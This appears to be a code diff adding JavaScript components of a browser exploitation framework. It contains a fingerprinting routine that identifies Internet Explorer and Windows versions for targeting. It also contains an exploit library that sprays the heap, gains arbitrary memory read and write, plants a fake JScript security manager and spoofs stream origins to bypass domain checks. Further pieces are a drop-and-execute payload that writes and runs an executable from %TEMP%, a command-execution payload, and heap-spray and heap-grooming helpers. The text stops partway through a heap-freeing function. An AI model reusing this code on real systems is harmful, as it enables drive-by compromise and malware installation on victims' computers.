+				// IE 8.0.7100.0, Windows 7 English
+				// IE 8.0.7100.0, Windows 7 64-bit English
+			case "5816385":
+				// IE 8.0.7600.16385, Windows 7 English
+			case "5816475":
+			case "5816762":
+				// IE 8.0.7600.16385, Windows 7 English
+				ua_version = "8.0";
+				os_name = "Windows 7";
+				os_sp = "SP0";
+				break;
+			case "5817514":
+				// IE 8.0.7600.17514, Windows 7 SP1 English
+				ua_version = "8.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "5818702":
+				// IE 8.0.6001.18702, XP Professional SP3 English
+			case "5822960":
+				// IE 8.0.6001.18702, XP Professional SP3 Greek
+				ua_version = "8.0";
+				os_name = "Windows XP";
+				os_sp = "SP3";
+				break;
+			case "9016406":
+				// IE 9.0.7930.16406, Windows 7 64-bit
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP0";
+				break;
+			case "9016441":
+				// IE 9.0.8112.16421, Windows 7 32-bit English
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016443":
+				// IE 9.0.8112.16421, Windows 7 Polish
+				// Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016446":
+				// IE 9.0.8112.16421, Windows 7 English (Update Versions: 9.0.7 (KB2699988)
+				// Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016464":
+				// browsershots.org, MSIE 7.0 / Windows 2008 R2
+				os_name = "Windows 2008 R2";
+				ua_version = "9.0";
+				break;
+			case "9016470":
+				// IE 9.0.8112.16421 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016502":
+				// IE 9.0.8112.16502 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016506":
+				// IE 9.0.8112.16506 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016514":
+				// IE 9.0.8112.16514 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016520":
+				// IE 9.0.8112.16520 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016526":
+				// IE 9.0.8112.16526 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "9016533":
+				// IE 9.0.8112.16533 / Windows 7 SP1
+				ua_version = "9.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "10016720":
+				// IE 10.0.9200.16721 / Windows 7 SP1
+				ua_version = "10.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "11016428":
+				// IE 11.0.9600.16428 / Windows 7 SP1
+				ua_version = "11.0";
+				os_name = "Windows 7";
+				os_sp = "SP1";
+				break;
+			case "10016384":
+				// IE 10.0.9200.16384 / Windows 8 x86
+				ua_version = "10.0";
+				os_name = "Windows 8";
+				os_sp = "SP0";
+				break;
+			case "11016426":
+				// IE 11.0.9600.16476 / KB2898785 (Technically: 11.0.2) Windows 8.1 x86 English
+				ua_version = "11.0";
+				os_name = "Windows 8.1";
+				break;
+			case "1000":
+				// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
+				ua_version = "10.0";
+				os_name = "Windows 8";
+				os_sp = "SP0";
+				break;
+			case "1100":
+				// IE 11.0.10011.0 Windows 10.0 (Build 10074) English - insider preview
+				ua_version = "11.0";
+				os_name = "Windows 10";
+				os_sp = "SP0";
+				break;
+			default:
+				unknown_fingerprint = version;
+				break;
+		}
+
+		if (!ua_version) {
+			// The ScriptEngine functions failed us, try some object detection
+			if (document.documentElement && (typeof document.documentElement.style.maxHeight)!="undefined") {
+				// IE 11 detection, see: http://msdn.microsoft.com/en-us/library/ie/bg182625(v=vs.85).aspx
+				try {
+					if (document.__proto__ != undefined) { ua_version = "11.0"; }
+				} catch (e) {}
+
+				// IE 10 detection using nodeName
+				if (!ua_version) {
+					try {
+						var badNode = document.createElement && document.createElement("badname");
+						if (badNode && badNode.nodeName === "BADNAME") { ua_version = "10.0"; }
+					} catch(e) {}
+				}
+
+				// IE 9 detection based on a "Object doesn't support property or method" error
+				if (!ua_version) {
+					try {
+						document.BADNAME();
+					} catch(e) {
+						if (e.message.indexOf("BADNAME") > 0) {
+							ua_version = "9.0";
+						}
+					}
+				}
+
+				// IE8 detection straight from IEBlog.  Thank you Microsoft.
+				if (!ua_version) {
+					try {
+						ua_version = "8.0";
+						document.documentElement.style.display = "table-cell";
+					} catch(e) {
+						// This executes in IE7,
+						// but not IE8, regardless of mode
+						ua_version = "7.0";
+					}
+				}
+			} else if (document.compatMode) {
+				ua_version = "6.0";
+			} else if (window.createPopup) {
+				ua_version = "5.5";
+			} else if (window.attachEvent) {
+				ua_version = "5.0";
+			} else {
+				ua_version = "4.0";
+			}
+			switch (navigator.appMinorVersion){
+				case ";SP2;":
+					os_sp = "SP2";
+					break;
+			}
+		}
+	}
+
+	if (!os_name && navigator.platform == "Win32") { os_name = oses_windows; }
+
+	//--
+	// Figure out the type of Windows
+	//--
+	if (!ua_is_lying) {
+		version = useragent.toLowerCase();
+	} else if (navigator.oscpu) {
+		// Then this is Gecko and we can get at least os_name without the
+		// useragent
+		version = navigator.oscpu.toLowerCase();
+	} else {
+		// All we have left is the useragent and we know it's lying, so don't bother
+		version = " ";
+	}
+	if (!os_name || 0 == os_name.length) {
+		if (version.indexOf("windows") != -1)    { os_name = oses_windows; }
+		else if (version.indexOf("mac") != -1)   { os_name = oses_mac_osx; }
+		else if (version.indexOf("linux") != -1) { os_name = oses_linux;   }
+	}
+	if (os_name == oses_windows) {
+		if (version.indexOf("windows 95") != -1)          { os_name = "Windows 95";    }
+		else if (version.indexOf("windows nt 4") != -1)   { os_name = "Windows NT";    }
+		else if (version.indexOf("win 9x 4.9") != -1)     { os_name = "Windows ME";    }
+		else if (version.indexOf("windows 98") != -1)     { os_name = "Windows 98";    }
+		else if (version.indexOf("windows nt 5.0") != -1) { os_name = "Windows 2000";  }
+		else if (version.indexOf("windows nt 5.1") != -1) { os_name = "Windows XP";    }
+		else if (version.indexOf("windows nt 5.2") != -1) { os_name = "Windows 2003";  }
+		else if (version.indexOf("windows nt 6.0") != -1) { os_name = "Windows Vista"; }
+		else if (version.indexOf("windows nt 6.1") != -1) { os_name = "Windows 7";     }
+		else if (version.indexOf("windows nt 6.2") != -1) { os_name = "Windows 8";     }
+		else if (version.indexOf("windows nt 6.3") != -1) { os_name = "Windows 8.1";   }
+	}
+	if (os_name == oses_linux && (!os_vendor || 0 == os_vendor.length)) {
+		if (version.indexOf("gentoo") != -1)       { os_vendor = "Gentoo";  }
+		else if (version.indexOf("ubuntu") != -1)  { os_vendor = "Ubuntu";  }
+		else if (version.indexOf("debian") != -1)  { os_vendor = "Debian";  }
+		else if (version.indexOf("rhel") != -1)    { os_vendor = "RHEL";    }
+		else if (version.indexOf("red hat") != -1) { os_vendor = "RHEL";    }
+		else if (version.indexOf("centos") != -1)  { os_vendor = "CentOS";  }
+		else if (version.indexOf("fedora") != -1)  { os_vendor = "Fedora";  }
+		else if (version.indexOf("android") != -1) { os_vendor = "Android"; }
+	}
+
+	//--
+	// Language
+	//--
+	if (navigator.systemLanguage) {
+		// ie
+		os_lang = navigator.systemLanguage;
+	} else if (navigator.language) {
+		// gecko derivatives, safari, opera
+		os_lang = navigator.language;
+	} else {
+		// some other browser and we don't know how to get the language, so
+		// just guess english
+		os_lang = "en";
+	}
+
+	//--
+	// Architecture
+	//--
+	if (typeof(navigator.cpuClass) != 'undefined') {
+		// Then this is IE or Opera9+ and we can grab the arch directly
+		switch (navigator.cpuClass) {
+			case "x86":
+				arch = arch_x86;
+				break;
+			case "x64":
+				arch = arch_x86_64;
+				break;
+		}
+	}
+	if (!arch || 0 == arch.length) {
+		// We don't have the handy-dandy navagator.cpuClass, so infer from
+		// platform
+		version = navigator.platform;
+		//document.write(version + "\\n");
+		// IE 8 does a bit of wacky user-agent switching for "Compatibility View";
+		// 64-bit client on Windows 7, 64-bit:
+		//     Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)
+		// 32-bit client on Windows 7, 64-bit:
+		//     Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)
+		// 32-bit client on Vista, 32-bit, "Compatibility View":
+		//     Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)
+		//
+		// Report 32-bit client on 64-bit OS as being 32 because exploits will
+		// need to know the bittedness of the process, not the OS.
+		if ( ("Win32" == version) || (version.match(/i.86/)) ) {
+			arch = arch_x86;
+		} else if (-1 != version.indexOf('x64') || (-1 != version.indexOf('x86_64')))  {
+			arch = arch_x86_64;
+		} else if (-1 != version.indexOf('PPC'))  {
+			arch = arch_ppc;
+		}
+	}
+
+	this.ua_is_lying = ua_is_lying;
+	this.os_name = os_name;
+	this.os_vendor = os_vendor;
+	this.os_flavor = os_flavor;
+	this.os_device = os_device;
+	this.os_sp = os_sp;
+	this.os_lang = os_lang;
+	this.arch = arch;
+	this.ua_name = ua_name;
+	this.ua_version = ua_version;
+	this.ua_version = ua_version;
+
+	return { os_name:os_name, os_vendor:os_vendor, os_flavor:os_flavor, os_device:os_device, os_sp:os_sp, os_lang:os_lang, arch:arch, ua_name:ua_name, ua_version:ua_version };
+}; // function getVersion
+
+os_detect.searchVersion = function(needle, haystack) {
+	var index = haystack.indexOf(needle);
+	var found_version;
+	if (index == -1) { return; }
+	found_version = haystack.substring(index+needle.length+1);
+	if (found_version.indexOf(' ') != -1) {
+		// Strip off any junk at the end such as a CLR declaration
+		found_version = found_version.substring(0,found_version.indexOf(' '));
+	}
+	return found_version;
+};
+
+
+/*
+ * Return -1 if a < b, 0 if a == b, 1 if a > b
+ */
+ua_ver_cmp = function(ver_a, ver_b) {
+	// shortcut the easy case
+	if (ver_a == ver_b) {
+		return 0;
+	}
+
+	a = ver_a.split(".");
+	b = ver_b.split(".");
+	for (var i = 0; i < Math.max(a.length, b.length); i++) {
+		// 3.0 == 3
+		if (!b[i]) { b[i] = "0"; }
+		if (!a[i]) { a[i] = "0"; }
+
+		if (a[i] == b[i]) { continue; }
+
+		a_int = parseInt(a[i]);
+		b_int = parseInt(b[i]);
+		a_rest = a[i].substr(a_int.toString().length);
+		b_rest = b[i].substr(b_int.toString().length);
+		if (a_int < b_int) {
+			return -1;
+		} else if (a_int > b_int) {
+			return 1;
+		} else { // ==
+			// Then we need to deal with the stuff after the ints, e.g.:
+			// "b4pre"
+			if (a_rest == "b" && b_rest.length == 0) {
+				return -1;
+			}
+			if (b_rest == "b" && a_rest.length == 0) {
+				return 1;
+			}
+			// Just give up and try a lexicographical comparison
+			if (a_rest < b_rest) {
+				return -1;
+			} else if (a_rest > b_rest) {
+				return 1;
+			}
+		}
+	}
+	// If we get here, they must be equal
+	return 0;
+};
+
+ua_ver_lt = function(a, b) {
+	if (-1 == this.ua_ver_cmp(a,b)) { return true; }
+	return false;
+};
+ua_ver_gt = function(a, b) {
+	if (1 == this.ua_ver_cmp(a,b)) { return true; }
+	return false;
+};
+ua_ver_eq = function(a, b) {
+	if (0 == this.ua_ver_cmp(a,b)) { return true; }
+	return false;
+};
@@ -0,0 +1,426 @@
+
+
+ExpLib = (function() {
+
+	function ExpLib( num_arrays, arr_size, base, payload ) {
+		this.arr1 = null;
+		this.arr2 = null;
+		this.base = base;
+		this.arr_size = arr_size;
+		this.arr_arr = null;
+		// Allows to control the contents of the sprayed memory.
+		// Have into account some array positions will be corrupted
+		// while leaking and modifying things.
+		this.arr_contents = [];
+
+		this.payload = payload;
+		this.modules = {}
+		this.getproc = null;
+		this.loadlibrary = null;
+
+		// Offset to the Origin URL in the Stream, modifying it
+		// allows to bypass msado15.SecurityCheck(), allowing
+		// for example to write stream contents to filesystem.
+		this.stream_origin = 0x44;
+	}
+
+	ExpLib.prototype.resolveAPI = function( modulename, procname ) {
+		var module  = this.resolveModule( modulename );
+
+		return this.callAPI( this.getproc, module, this.allocateString(procname) );
+	}
+
+	ExpLib.prototype.resolveModule = function( modulename ) {
+		if ( this.modules[modulename] )
+			return this.modules[modulename];
+
+		var module = this.callAPI( this.loadlibrary, this.allocateString(modulename) );
+		this.modules[modulename] = module;
+		return module;
+	}
+
+	ExpLib.prototype.spray = function() {
+		this.arr_arr = new Array( num_arrays );
+
+		var decl = "[";
+
+		for ( var i = 0; i < this.arr_size - 1; ++ i ) {
+			decl += '0,';
+		}
+
+		decl += '0';
+		decl += ']';
+
+		for ( var i = 0; i < num_arrays; ++ i ) {
+			this.arr_arr[i] = eval(decl);
+			for(var j = 0; j < this.arr_contents.length; j++) {
+				this.arr_arr[i][j] = this.arr_contents[j];
+			}
+		}
+
+  }
+
+	// Should be used before calling spray()
+	ExpLib.prototype.setArrContents = function(contents) {
+		for(var i = 0; i < this.arr_size && i < contents.length; i++) {
+			this.arr_contents[i] = contents[i];
+		}
+	}
+
+  ExpLib.prototype.setValue = function(i1, i2, v) {
+		this.arr_arr[i1][i2] = v;
+	}
+
+
+  ExpLib.prototype.setValueByAddr = function(index, addr, v) {
+		this.arr_arr[index][((addr % 0x1000) - 0x20) / 4] = v;
+	}
+
+	ExpLib.prototype.read32 = function(addr) {
+		if ( addr % 4 ) {
+			// error
+		}
+
+		if ( addr >= this.arr2_member_base ) {
+			return this.arr2[(addr - this.arr2_member_base)/4];
+		} else {
+			return this.arr2[0x40000000 - (this.arr2_member_base - addr)/4]
+		}
+	}
+
+	ExpLib.prototype.write32 = function(addr, value) {
+		if ( addr % 4 ) {
+			// error
+		}
+
+		if ( value >= 0x80000000 )
+			value = -(0x100000000 - value);
+
+		//alert(((addr - this.arr2_member_base)/4).toString(16));
+		if ( addr >= this.arr2_member_base ) {
+			this.arr2[(addr - this.arr2_member_base)/4] = value;
+		} else {
+			this.arr2[0x40000000 - (this.arr2_member_base - addr) / 4] = value;
+		}
+	}
+
+	ExpLib.prototype.read8 = function(addr) {
+		var value = this.read32( addr  & 0xfffffffc );
+		switch ( addr % 4 ) {
+			case 0: return (value & 0xff);
+			case 1: return ((value >> 8) & 0xff);
+			case 2: return ((value >> 16) & 0xff);
+			case 3: return ((value >> 24) & 0xff);
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.write8 = function(addr, value) {
+		var original_value = this.read32( addr  & 0xfffffffc );
+		var new_value;
+
+		switch ( addr % 4 ) {
+			case 0:
+				new_value = (original_value & 0xffffff00) | (value & 0xff);
+				break;
+
+			case 1:
+				new_value = (original_value & 0xffff00ff) | ((value & 0xff) << 8);
+				break;
+			case 2:
+				new_value = (original_value & 0xff00ffff) | ((value & 0xff) << 16);
+				break;
+			case 3:
+				new_value = (original_value & 0x00ffffff) | ((value & 0xff) << 24);
+				break;
+		}
+
+
+		this.write32( addr  & 0xfffffffc, new_value );
+	}
+
+
+	ExpLib.prototype.writeBytes = function(addr, bytes) {
+		for ( var i = 0; i + 3 < bytes.length; i += 4 ) {
+			var value = (bytes[i] & 0xff) | ((bytes[i+1] & 0xff) << 8) |
+						((bytes[i + 2] & 0xff) << 16) | ((bytes[i + 3] & 0xff) << 24);
+
+			this.write32( addr + i, value );
+		}
+
+		for ( ; i < bytes.length; ++ i ) {
+			this.write8( addr + i, bytes[i] );
+		}
+	}
+
+	ExpLib.prototype.writeString = function(addr, s) {
+		var bytes = [];
+		var i = 0;
+		for ( ; i < s.length; ++ i ) {
+			bytes[i] = s.charCodeAt(i);
+		}
+
+		bytes[i] = 0;
+
+		this.writeBytes( addr, bytes );
+	}
+
+	ExpLib.prototype.writeStringW = function(addr, s) {
+		var bytes = [];
+		var i = 0;
+		for ( ; i < s.length; ++i ) {
+			bytes[i * 2] = s.charCodeAt(i);
+			bytes[i * 2 + 1] = 0;
+		}
+
+		bytes[s.length * 2] = 0;
+		bytes[s.length * 2 + 1] = 0;
+
+		this.writeBytes( addr, bytes );
+	}
+
+	ExpLib.prototype.read16 = function(addr) {
+		if ( addr % 2 ) {
+					// error, not aligned
+		}
+
+		var value = this.read32( addr  & 0xfffffffc );
+		switch ( addr % 4 ) {
+			case 0: return (value & 0xffff);
+			case 1: return ((value >> 8) & 0xffff);
+			case 2: return ((value >> 16) & 0xffff);
+			case 3: /*not supported*/ break;
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.strequal = function(addr, s)  {
+		for ( var i = 0; i < s.length; ++ i ) {
+			if ( this.read8(addr + i) != s.charCodeAt(i) )
+				return false;
+		}
+
+		return true;
+	}
+
+
+	ExpLib.prototype.getModuleBase = function(addr) {
+
+		var cur_addr = addr;
+
+		while ( cur_addr > 0 ) {
+
+			if ( (this.read32(cur_addr) & 0xffff) == 0x5a4d ) {
+				return cur_addr;
+			}
+
+			cur_addr -= 0x10000;
+		}
+
+		return 0;
+	}
+
+
+
+	ExpLib.prototype.getModuleBaseFromIAT = function(base, name) {
+		var import_table = base + this.read32( base + this.read32(base + 0x3c) + 0x80 );
+		var cur_table = import_table;
+
+		while ( cur_table < import_table + 0x1000 ) {
+
+			var name_addr = base + this.read32(cur_table + 12);
+			if ( this.strequal( name_addr, name ) ) {
+				var iat = base + this.read32(cur_table + 16);
+				var func = this.read32(iat);
+				while ( 0 == func ) {
+					iat += 4;
+					func = this.read32(iat);
+				}
+
+				return this.getModuleBase( func & 0xFFFF0000 );
+
+			}
+
+			cur_table += 20;
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.getProcAddress = function(base, procname)  {
+		var export_table = base + this.read32( base + this.read32(base + 0x3c) + 0x78 );
+		var num_functions = this.read32( export_table + 20 );
+		var addr_functions = base + this.read32( export_table + 28 );
+		var addr_names = base + this.read32( export_table + 32 );
+		var addr_ordinals = base + this.read32( export_table + 36 );
+
+		for ( var i = 0; i < num_functions; ++ i ) {
+			var name_addr = this.read32( addr_names + i * 4 ) + base;
+			if ( this.strequal( name_addr, procname ) ) {
+				var ordinal = this.read16( addr_ordinals + i * 2 );
+				var result = this.read32( addr_functions + ordinal * 4 ) + base;
+				return result;
+			}
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.searchBytes = function(pattern, start, end)  {
+
+		if ( start >= end || start + pattern.length > end )
+			return 0;
+
+		var pos = start;
+		while ( pos < end ) {
+			for ( var i = 0; i < pattern.length; ++ i ) {
+				if ( this.read8(pos + i) != pattern[i] )
+					break;
+			}
+
+			if ( i == pattern.length ) {
+				return pos;
+			}
+
+			++ pos;
+		}
+
+		return 0;
+	}
+
+
+	ExpLib.prototype.getError = function(msg) {
+		return this.err_msg;
+	}
+
+	ExpLib.prototype.setError = function(msg) {
+		this.err_msg = msg;
+	}
+
+	ExpLib.prototype.setStreamOrigin = function(offset) {
+		this.stream_origin = offset;
+	}
+
+	ExpLib.prototype.getStreamOrigin = function() {
+		return this.stream_origin;
+	}
+
+	ExpLib.prototype.memcpy = function(dst, src, size) {
+		var i = 0;
+		for ( ; i < size - 4; i += 4 ) {
+			this.write32( dst + i, this.read32(src + i) );
+		}
+
+		for ( ; i < size; ++ i ) {
+			this.write8( dst + i, this.read8(src + i) );
+		}
+	}
+
+	ExpLib.prototype.go = function() {
+
+		var i = 0;
+
+
+
+		for ( ; i < this.arr_arr.length - 1; ++ i ) {
+			this.arr_arr[i][this.arr_size + 0x1c / 4] = 0;
+
+			if ( this.arr_arr[i][this.arr_size + 0x18 / 4] == this.arr_size ) {
+				this.arr_arr[i][this.arr_size + 0x14 / 4] = 0x3fffffff;
+				this.arr_arr[i][this.arr_size + 0x18 / 4] = 0x3fffffff;
+
+				this.arr_arr[i + 1].length = 0x3fffffff;
+
+				if ( this.arr_arr[i+1].length == 0x3fffffff ) {
+					break;
+				}
+			}
+
+		}
+
+		if ( i >= this.arr_arr.length - 1 ) {
+			this.setError( "Cannot find array with corrupt length!" );
+			return false;
+		}
+
+		this.arr1_idx = i;
+		this.arr2_idx = i + 1;
+
+		this.arr1 = this.arr_arr[i];
+		this.arr2 = this.arr_arr[i + 1];
+
+		this.arr2_base = this.base + 0x1000;
+		this.arr2_member_base = this.arr2_base + 0x20;
+
+		var func_addr = this.leakAddress(ActiveXObject);
+		var script_engine_addr = this.read32(this.read32(func_addr + 0x1c) + 4);
+
+		//alert(script_engine_addr.toString(16));
+
+		var original_securitymanager = this.read32( script_engine_addr + 0x21c );
+		if ( !original_securitymanager ) {
+			// let security manager to be valid
+			try {
+				var WshShell = new ActiveXObject("WScript.shell");
+			} catch (e) {}
+
+			original_securitymanager = this.read32( script_engine_addr + 0x21c );
+		}
+
+		var original_securitymanager_vtable = this.read32(original_securitymanager);
+		var securitymanager_size = 0x28;
+		var fake_securitymanager = 0x1a1b2010;
+		var fake_securitymanager_vtable = fake_securitymanager + 0x28;
+		//alert(original_securitymanager.toString(16));
+
+		this.memcpy( fake_securitymanager, original_securitymanager, securitymanager_size );
+		this.memcpy( fake_securitymanager_vtable, original_securitymanager_vtable, 0x70 );
+		this.write32( fake_securitymanager, fake_securitymanager_vtable );
+		this.write32(script_engine_addr + 0x21c, fake_securitymanager);
+
+		var jscript9_base = this.getModuleBase( this.read32(script_engine_addr) & 0xffff0000 );
+		var jscript9_code_start = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x104);
+		var jscript9_code_end = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x108);
+
+
+		this.write32( fake_securitymanager_vtable + 0x14,
+					 this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x08], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 8; */
+
+		this.write32( fake_securitymanager_vtable + 0x10,
+					 this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x04], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 4; */
+
+		this.payload.execute(this);
+
+
+		/*
+		* restore
+		*/
+
+		this.write32( script_engine_addr + 0x21c, original_securitymanager );
+
+		return true;
+
+	}
+
+	ExpLib.prototype.leakAddress = function(obj) {
+		this.arr_arr[this.arr2_idx + 1][2] = obj;
+		return this.read32(this.arr2_member_base + 0x1008);
+	}
+
+	ExpLib.prototype.switchStreamOrigin = function(stream) {
+		var obj = this.leakAddress(stream);
+		var stream_obj = this.read32(obj + 0x30);
+		//var url_addr = this.read32(stream_obj + 0x3c);
+		var url_addr = this.read32(stream_obj + this.stream_origin);
+
+		/*
+		* bypass domain check
+		*/
+		this.writeStringW( url_addr, 'file:///C:/1.htm' );
+	}
+
+	return ExpLib;
+
+})();
@@ -0,0 +1,33 @@
+function payload_drop_exec(pe) {
+
+	this.execute = function(explib) {
+
+		var WshShell = new ActiveXObject("WScript.shell");
+		var temp = WshShell.ExpandEnvironmentStrings("%TEMP%");
+		var filename = temp + "\\a.exe";
+
+		var bStream = new ActiveXObject("ADODB.Stream");
+		var txtStream = new ActiveXObject("ADODB.Stream");
+		bStream.Type = 1;
+		txtStream.Type = 2;
+
+		bStream.Open();
+		txtStream.Open();
+
+		explib.switchStreamOrigin(txtStream);
+
+		txtStream.WriteText(pe);
+		txtStream.Position = 2;
+		txtStream.CopyTo( bStream );
+		txtStream.Close();
+
+		explib.switchStreamOrigin(bStream);
+
+		bStream.SaveToFile(filename, 2);
+		bStream.Close();
+
+		oExec = WshShell.Exec(filename);
+	}
+
+	return this;
+}
@@ -0,0 +1,10 @@
+function payload_exec(cmd) {
+
+	this.execute = function(explib) {
+
+		var WshShell = new ActiveXObject("WScript.shell");
+		var oExec = WshShell.Exec(cmd);
+	}
+
+	return this;
+}
@@ -0,0 +1,17 @@
+var memory = new Array();
+function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
+  var index;
+  var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
+  var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
+  while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
+  while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
+
+  var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
+  while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
+  retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
+
+  var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
+  for (index = 0; index < heapBlockCnt; index++) {
+    memory[index] = retSlide + shellcode;
+  }
+}
@@ -0,0 +1,192 @@
+//heapLib2 namespace
+function heapLib2() { } 
+
+//These are attributes that will not actually create a bstr 
+//and directly use the back-end allocator, completely bypassing the cache
+var global_attrs = ["title", "lang", "class"];
+
+heapLib2.ie = function(element, maxAlloc)
+{
+    //128mb
+    this.maxAlloc = 0x8000000;
+
+    //make sure that an HTML DOM element is passed
+    if(!element.nodeType || element.nodeType != 1)
+        throw "alloc.argument: element not valid"; 
+
+    this.element = element; 
+
+    if(maxAlloc)
+        this.maxAlloc = maxAlloc; 
+
+    //empty the cache
+    this.Oleaut32EmptyCache();
+    this.Oleaut32FillCache();
+    this.Oleaut32EmptyCache();
+
+}
+
+heapLib2.ie.prototype.newelement = function(element)
+{
+    //make sure that an HTML DOM element is passed
+    if(!element.nodeType || element.nodeType != 1)
+        throw "alloc.argument: element not valid"; 
+
+    this.element = element; 
+}
+
+heapLib2.ie.prototype.alloc = function(attr_name, size, cache_ok) 
+{
+    if(typeof(cache_ok)==='undefined')
+        cache_ok = false;
+    else
+        cache_ok = true;
+
+    //make sure the attribute name is a string
+    if(typeof attr_name != "string")
+        throw "alloc.argument: attr_name is not a string"; 
+
+    //make sure that the attribute name is not already present in the html element
+    if(this.element.getAttribute(attr_name))
+        throw "alloc.argument: element already contains attr_name: " + attr_name;
+
+    //ensure the size is a number
+    if(typeof size != "number")
+        throw "alloc.argument: size is not a number: " + size; 
+
+    //make sure the size isn't one of the special values
+    if(!cache_ok && (size == 0x20 || size == 0x40 || size == 0x100 || size == 0x8000)) 
+        throw "alloc.argument: size cannot be flushed from cache: " + size; 
+
+    if(size > this.maxAlloc)
+        throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size; 
+
+    //the size must be at a 16-byte boundary this can be commented out but 
+    //the allocations will be rounded to the nearest 16-byte boundary 
+    if(size % 16 != 0)
+        throw "alloc.argument: size be a multiple of 16: " + size;
+
+    //20-bytes will be added to the size
+    //<4-byte size><data><2-byte null>
+    size = ((size / 2) - 6);
+
+    //May have to change this due to allocation side effects
+    var data = new Array(size).join(cache_ok ? "C" : "$"); 
+
+    var attr = document.createAttribute(attr_name);
+    this.element.setAttributeNode(attr);
+    this.element.setAttribute(attr_name, data);
+
+}
+
+//These items will allocate/free memory and should really 
+//only be used once per element. You can use a new element 
+//by calling the 'newelement' method above
+heapLib2.ie.prototype.alloc_nobstr = function(val)
+{
+    //make sure the aval is a string
+    if(typeof val != "string")
+        throw "alloc.argument: val is not a string"; 
+
+    var size = (val.length * 2) + 6; 
+
+    if(size > this.maxAlloc)
+        throw "alloc_nobstr.val: string length cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size; 
+
+    var i = 0;
+    var set_gattr = 0; 
+    for(i = 0; i < global_attrs.length; i++)
+    {
+        curr_gattr = global_attrs[i];
+        if(!this.element.getAttribute(curr_gattr))
+        {
+            this.element.setAttribute(curr_gattr, "");
+            this.element.setAttribute(curr_gattr, val);
+            set_gattr = 1;  
+            break; 
+        }
+    }
+
+    if(set_gattr == 0)
+        throw "alloc_nobstr: all global attributes are assigned, try a new element"; 
+}
+
+//completely bypass the cache, useful for heap spraying (see heapLib2_test.html)
+heapLib2.ie.prototype.sprayalloc = function(attr_name, str) 
+{
+    //make sure the attribute name is a string
+    if(typeof attr_name != "string")
+        throw "alloc.argument: attr_name is not a string"; 
+
+    //make sure that the attribute name is not already present in the html element
+    if(this.element.getAttribute(attr_name))
+        throw "alloc.argument: element already contains attr_name: " + attr_name;
+
+    //ensure the size is a number
+    if(typeof str != "string")
+        throw "alloc.argument: str is not a string: " + typeof str; 
+
+    var size = (str.length * 2) + 6; 
+
+    //make sure the size isn't one of the special values
+    if(size <= 0x8000) 
+        throw "alloc.argument: bigalloc must be greater than 0x8000: " + size; 
+
+    if(size > this.maxAlloc)
+        throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size; 
+
+    var attr = document.createAttribute(attr_name);
+    this.element.setAttributeNode(attr);
+    this.element.setAttribute(attr_name, str);
+}
+
+heapLib2.ie.prototype.free = function(attr_name, skip_flush) 
+{
+    if(typeof(skip_flush)==='undefined')
+        skip_flush = false;
+    else
+        skip_flush = true;
+
